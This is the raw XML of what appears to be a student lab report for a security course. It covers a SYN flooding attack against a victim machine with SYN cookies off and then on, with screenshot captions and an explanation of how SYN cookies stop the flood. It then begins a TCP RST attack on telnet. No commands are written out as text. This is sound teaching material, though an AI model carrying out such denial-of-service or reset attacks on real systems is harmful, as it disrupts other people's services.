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06E774" w14:textId="0BB884BF" w:rsidR="00B52DC9" w:rsidRDefault="00376D00" w:rsidP="00164485">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>Lab 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD0BA85" w14:textId="4BB94A77" w:rsidR="00376D00" w:rsidRDefault="00376D00" w:rsidP="00164485">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Cmpsc 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C93794" w14:textId="7F873568" w:rsidR="00376D00" w:rsidRPr="00376D00" w:rsidRDefault="003E1D98" w:rsidP="00164485">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="2541981C" w14:textId="75457C6A" w:rsidR="00376D00" w:rsidRDefault="00376D00" w:rsidP="00164485"/>
    <w:p w14:paraId="05C2D5C3" w14:textId="19C7234A" w:rsidR="00376D00" w:rsidRDefault="00376D00" w:rsidP="00164485">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00376D00">
        <w:t>Task 1: SYN Flooding Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A18FAC" w14:textId="26510B3A" w:rsidR="00607579" w:rsidRPr="00607579" w:rsidRDefault="00607579" w:rsidP="00607579">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00A83755">
        <w:t>“Attacker” and “Victim” folders to distinguish between the two.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7C55A1" w14:textId="77777777" w:rsidR="0075194B" w:rsidRDefault="0075194B" w:rsidP="00164485">
      <w:r>
        <w:t>Checking IP addresses of the Victim and the Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4683E536" w14:textId="48D8CD53" w:rsidR="0075194B" w:rsidRDefault="00A62E03" w:rsidP="00164485">
      <w:r w:rsidRPr="00A62E03">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4049C83D" wp14:editId="48BB95E5">
            <wp:extent cx="5699125" cy="1855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99125" cy="1855470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="283C1BDD" w14:textId="77777777" w:rsidR="0075194B" w:rsidRDefault="0075194B" w:rsidP="00164485"/>
    <w:p w14:paraId="2DC670C4" w14:textId="78E259F5" w:rsidR="00376D00" w:rsidRPr="00164485" w:rsidRDefault="00A62E03" w:rsidP="00164485">
      <w:r w:rsidRPr="00A62E03">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EA216A0" wp14:editId="0E9729AB">
            <wp:extent cx="5699125" cy="1891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99125" cy="1891665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0075194B">
        <w:br/>
      </w:r>
      <w:r w:rsidR="0075194B">
        <w:br/>
      </w:r>
      <w:r w:rsidR="008C52D0" w:rsidRPr="00164485">
        <w:t>Checking the size of the queue in the victim’s computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344A8542" w14:textId="3306E45E" w:rsidR="008C52D0" w:rsidRDefault="008C52D0" w:rsidP="00164485">
      <w:r w:rsidRPr="008C52D0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="041187BF" wp14:editId="7A8A9F1C">
            <wp:extent cx="5699125" cy="9766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99125" cy="976630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A73B2E8" w14:textId="6AFC5542" w:rsidR="008C52D0" w:rsidRDefault="00543873" w:rsidP="00164485">
      <w:r>
        <w:br/>
        <w:t>Checking the current usage of the queue</w:t>
      </w:r>
      <w:r w:rsidR="00950303">
        <w:t xml:space="preserve"> (redid this step)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BB3FF1" w14:textId="69EA616E" w:rsidR="00543873" w:rsidRDefault="00950303" w:rsidP="00164485">
      <w:r w:rsidRPr="00950303">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FA899EB" wp14:editId="79D48F1D">
            <wp:extent cx="5699125" cy="7029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99125" cy="702945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0C36CA" w14:textId="67FFAEC6" w:rsidR="00C72944" w:rsidRDefault="00C72944" w:rsidP="00164485"/>
    <w:p w14:paraId="56E0D624" w14:textId="239015D3" w:rsidR="00607579" w:rsidRDefault="00607579" w:rsidP="00164485"/>
    <w:p w14:paraId="69A1FF6A" w14:textId="77777777" w:rsidR="00607579" w:rsidRDefault="00607579" w:rsidP="00164485"/>
    <w:p w14:paraId="320550F6" w14:textId="06D07574" w:rsidR="00C72944" w:rsidRDefault="00C72944" w:rsidP="00607579">
      <w:r w:rsidRPr="00C72944">
        <w:lastRenderedPageBreak/>
        <w:t>Display the SYN cookie flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D9C43B" w14:textId="2224A795" w:rsidR="00543873" w:rsidRDefault="00C72944" w:rsidP="00164485">
      <w:r w:rsidRPr="00C72944">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="733DC782" wp14:editId="65272A05">
            <wp:extent cx="5699125" cy="1282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6217"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5699125" cy="1282700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A034E7" w14:textId="76F335E1" w:rsidR="005F5E6B" w:rsidRDefault="005F5E6B" w:rsidP="00164485"/>
    <w:p w14:paraId="6B66EB4D" w14:textId="4F3564EE" w:rsidR="00C72944" w:rsidRDefault="00C72944" w:rsidP="00164485">
      <w:r w:rsidRPr="00950303">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>We will start with the SYN cookie flag off.</w:t>
      </w:r>
      <w:r w:rsidRPr="00950303">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:t>turning the flag off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094446DD" w14:textId="65EC0F6B" w:rsidR="00C72944" w:rsidRDefault="00C72944" w:rsidP="00164485">
      <w:r w:rsidRPr="00C72944">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07CC9026" wp14:editId="7AD920C9">
            <wp:extent cx="5699125" cy="407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9125" cy="407035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C187841" w14:textId="41CA1D2C" w:rsidR="00A83755" w:rsidRDefault="00A83755" w:rsidP="00164485"/>
    <w:p w14:paraId="40A0E162" w14:textId="4A557023" w:rsidR="00C72944" w:rsidRDefault="00A62E03" w:rsidP="00164485">
      <w:r>
        <w:t>Attacking the victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABBDD29" w14:textId="6702A52A" w:rsidR="00A62E03" w:rsidRDefault="0052785B" w:rsidP="00164485">
      <w:r w:rsidRPr="0052785B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B871917" wp14:editId="50CFE2A6">
            <wp:extent cx="5699125" cy="4171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99125" cy="417195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEC8CB2" w14:textId="77777777" w:rsidR="00B37CF9" w:rsidRDefault="00B37CF9" w:rsidP="00164485"/>
    <w:p w14:paraId="643FE449" w14:textId="597837EA" w:rsidR="00DC4C5F" w:rsidRDefault="00B37CF9" w:rsidP="00DC4C5F">
      <w:r>
        <w:t>Victim’s perspective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7405FE1F" w14:textId="528AA647" w:rsidR="00B37CF9" w:rsidRDefault="0052785B" w:rsidP="00DC4C5F">
      <w:r w:rsidRPr="0052785B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C19C7AA" wp14:editId="18452567">
            <wp:extent cx="5699125" cy="4159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99125" cy="415925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="242464F2" w14:textId="39D46736" w:rsidR="00A83755" w:rsidRDefault="00A83755" w:rsidP="00164485"/>
    <w:p w14:paraId="2488581D" w14:textId="7AD40A88" w:rsidR="00950303" w:rsidRDefault="00950303" w:rsidP="00164485">
      <w:r>
        <w:t>Showing DoS from the victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261B8FBC" w14:textId="18636F62" w:rsidR="00950303" w:rsidRDefault="00950303" w:rsidP="0092408D">
      <w:r w:rsidRPr="00950303">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="354DED25" wp14:editId="48DF4E87">
            <wp:extent cx="5699125" cy="6527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99125" cy="652780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D57401B" w14:textId="6F1E62C7" w:rsidR="00950303" w:rsidRDefault="00950303" w:rsidP="00164485"/>
    <w:p w14:paraId="206B11BF" w14:textId="4697C0B0" w:rsidR="00950303" w:rsidRDefault="00950303" w:rsidP="00950303">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Now we will try with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00950303">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SYN cookie flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="00950303">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00950303">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:t>turning the flag on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C7FB46" w14:textId="560048D1" w:rsidR="00340D13" w:rsidRDefault="00340D13" w:rsidP="00950303">
      <w:r w:rsidRPr="00340D13">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63F66D63" wp14:editId="6D8525C7">
            <wp:extent cx="5699125" cy="3352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99125" cy="335280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C41DA0C" w14:textId="5CF482D8" w:rsidR="00340D13" w:rsidRDefault="00340D13" w:rsidP="00950303"/>
    <w:p w14:paraId="2B4C7D79" w14:textId="4528BCBB" w:rsidR="00340D13" w:rsidRDefault="00340D13" w:rsidP="00950303">
      <w:r>
        <w:t>Let’s attack again</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F80ED32" w14:textId="2A393D78" w:rsidR="00340D13" w:rsidRDefault="00340D13" w:rsidP="00950303">
      <w:r w:rsidRPr="00340D13">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F0A8B4C" wp14:editId="2D29734E">
            <wp:extent cx="5699125" cy="4165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99125" cy="416560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F7FF08" w14:textId="21201EED" w:rsidR="00340D13" w:rsidRDefault="00340D13" w:rsidP="00950303"/>
    <w:p w14:paraId="684F2750" w14:textId="560D2D87" w:rsidR="00340D13" w:rsidRDefault="00340D13" w:rsidP="00950303">
      <w:r>
        <w:t>Victim’s perspective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52986976" w14:textId="1D07CE39" w:rsidR="00340D13" w:rsidRDefault="0092408D" w:rsidP="00950303">
      <w:r w:rsidRPr="0092408D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="798B321C" wp14:editId="1054984D">
            <wp:extent cx="5168900" cy="5200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2954" cy="524490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7F2677" w14:textId="26E6C9FF" w:rsidR="0092408D" w:rsidRDefault="0092408D" w:rsidP="00950303"/>
    <w:p w14:paraId="7EDFF81A" w14:textId="40009A29" w:rsidR="0092408D" w:rsidRDefault="0092408D" w:rsidP="00950303">
      <w:r>
        <w:t>But!, we won’t achieve DoS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC06EE4" w14:textId="291552D3" w:rsidR="00950303" w:rsidRDefault="0092408D" w:rsidP="0092408D">
      <w:r w:rsidRPr="0092408D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EBA97C5" wp14:editId="79B8FA49">
            <wp:extent cx="5219700" cy="11108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0118"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5257219" cy="1118806"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EACF44" w14:textId="13DC3E19" w:rsidR="00950303" w:rsidRDefault="0092408D" w:rsidP="00164485">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The SYN flooding attack is </w:t>
      </w:r>
      <w:r w:rsidR="00850195">
        <w:t>based about the fact that a server that receives a SYN message will send back a SYN-ACK message and that the server will save the SYN-ACK data and the position of the request on the queue.</w:t>
      </w:r>
      <w:r w:rsidR="00850195">
        <w:br/>
        <w:t>with the SYN cookie mechanism, the server does not save the requests on the queue. The server will send to the client a SYN cookie from which he could later on retrieve the data of the SYN-ACK it is sending to the client, like that the server is able to delete the position of the request and the data of the SYN-ACK message that it has sent, and when the client is sending back his ACK message and the SYN cookie that he had receive from the server, the server will be able to retrieve the data that it had delete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0928A092" w14:textId="46FCB227" w:rsidR="00950303" w:rsidRDefault="00950303" w:rsidP="00164485"/>
    <w:p w14:paraId="674B521D" w14:textId="4514DBAC" w:rsidR="007E7FD1" w:rsidRDefault="007E7FD1" w:rsidP="00164485"/>
    <w:p w14:paraId="4C3C3A43" w14:textId="3D9401F1" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="721B6013" w14:textId="1F41BDD4" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="381C2A7C" w14:textId="2B96A0EE" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="4CA881AF" w14:textId="7783EB64" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="1AEA4CD9" w14:textId="2992DB81" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="01FB9FF6" w14:textId="2D344768" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="49A42C9C" w14:textId="3A50469F" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="34B21575" w14:textId="2EEDFF39" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="7B64FFC0" w14:textId="6CB464FB" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="5F92D151" w14:textId="1E74EC11" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="06910146" w14:textId="03EA9DA5" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="5AAE73CB" w14:textId="719D1D11" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="33710BB7" w14:textId="12DB2CBF" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="7D5056E0" w14:textId="0E21D81F" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="436CE3C5" w14:textId="436AD37C" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="74400A7E" w14:textId="57DF8ACB" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="35DC73E0" w14:textId="655621F4" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="346175B8" w14:textId="19EDD2C9" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="53BC32AC" w14:textId="75F0DF86" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="34BC1F3A" w14:textId="3006BE2D" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="0DBA907A" w14:textId="494560C7" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="059E7E93" w14:textId="2C6A7D6F" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="0C5ACF5D" w14:textId="12D1D391" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="16AE1EAC" w14:textId="30DB5A6B" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="6A287B9B" w14:textId="2E1AE71D" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="59211C66" w14:textId="664B5F3A" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="74911CAB" w14:textId="7E05BBD6" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="3D03FA5A" w14:textId="5CA8210A" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="39086E60" w14:textId="137F2861" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="103CBA01" w14:textId="04B864A6" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="30F9F532" w14:textId="00403E2F" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="3B9E3B56" w14:textId="405716CE" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="6812A66A" w14:textId="2E871896" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="0FC6F16F" w14:textId="5E28F8FA" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="64E47DDD" w14:textId="2CBD6878" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="795D8D9F" w14:textId="150EF849" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="7A57D52B" w14:textId="1699CBDC" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="252E6681" w14:textId="001F2375" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="459FE2A5" w14:textId="21C6B50D" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="5F1C852B" w14:textId="77777777" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="3FF175D0" w14:textId="13E2943D" w:rsidR="00376D00" w:rsidRDefault="00376D00" w:rsidP="00164485">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Task 2: TCP RST Attacks on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Bold" w:hAnsi="NimbusMonL-Bold" w:cs="NimbusMonL-Bold"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">telnet </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Bold" w:hAnsi="NimbusMonL-Bold" w:cs="NimbusMonL-Bold"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ssh </w:t>
      </w:r>
      <w:r>
        <w:t>Connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765DA23A" w14:textId="4D0CA10E" w:rsidR="00376D00" w:rsidRDefault="007E63CA" w:rsidP="00164485">
      <w:r>
        <w:t>Victim’s details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D61089" w14:textId="2BABD616" w:rsidR="007E63CA" w:rsidRDefault="007E63CA" w:rsidP="00164485">
      <w:r w:rsidRPr="007E63CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A40C64E" wp14:editId="348D8B36">
            <wp:extent cx="5699125" cy="4933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9125" cy="493395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3703B837" w14:textId="788B7A1D" w:rsidR="007E63CA" w:rsidRDefault="007E63CA" w:rsidP="00164485"/>
    <w:p w14:paraId="19D8972F" w14:textId="127FB4BB" w:rsidR="007E63CA" w:rsidRDefault="007E63CA" w:rsidP="00164485">
      <w:r>
        <w:t>Server’s details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48452C9F" w14:textId="747E147E" w:rsidR="007E63CA" w:rsidRDefault="007E63CA" w:rsidP="00164485">
      <w:r w:rsidRPr="007E63CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23E50D54" wp14:editId="4ED3BDCE">
            <wp:extent cx="5699125" cy="5162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99125" cy="516255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AC431F" w14:textId="7317FCA8" w:rsidR="007E63CA" w:rsidRDefault="007E63CA" w:rsidP="00164485"/>
    <w:p w14:paraId="7A44BA95" w14:textId="4890CCA7" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485">
      <w:r>
        <w:t>Attacker’s details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7607F2FD" w14:textId="0FF8D3C5" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485">
      <w:r w:rsidRPr="00BA033E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42B0C3F0" wp14:editId="68A4A91E">
            <wp:extent cx="5699125" cy="515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99125" cy="515620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E0E74F" w14:textId="4D4B41DE" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="5B2AB9D6" w14:textId="2B40ABF1" w:rsidR="00572796" w:rsidRPr="00572796" w:rsidRDefault="00572796" w:rsidP="003054D9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00572796">
        <w:t>Telnet Connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AB1F54" w14:textId="1C2C9258" w:rsidR="001254DF" w:rsidRDefault="007E63CA" w:rsidP="00164485">
      <w:r>
        <w:t>Creating telnet connection from the victim to the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F6F17D" w14:textId="25E657DF" w:rsidR="000001D6" w:rsidRDefault="000001D6" w:rsidP="00164485">
      <w:r w:rsidRPr="000001D6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10C5C6AE" wp14:editId="141619B2">
            <wp:extent cx="5699125" cy="23920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99125" cy="2392045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
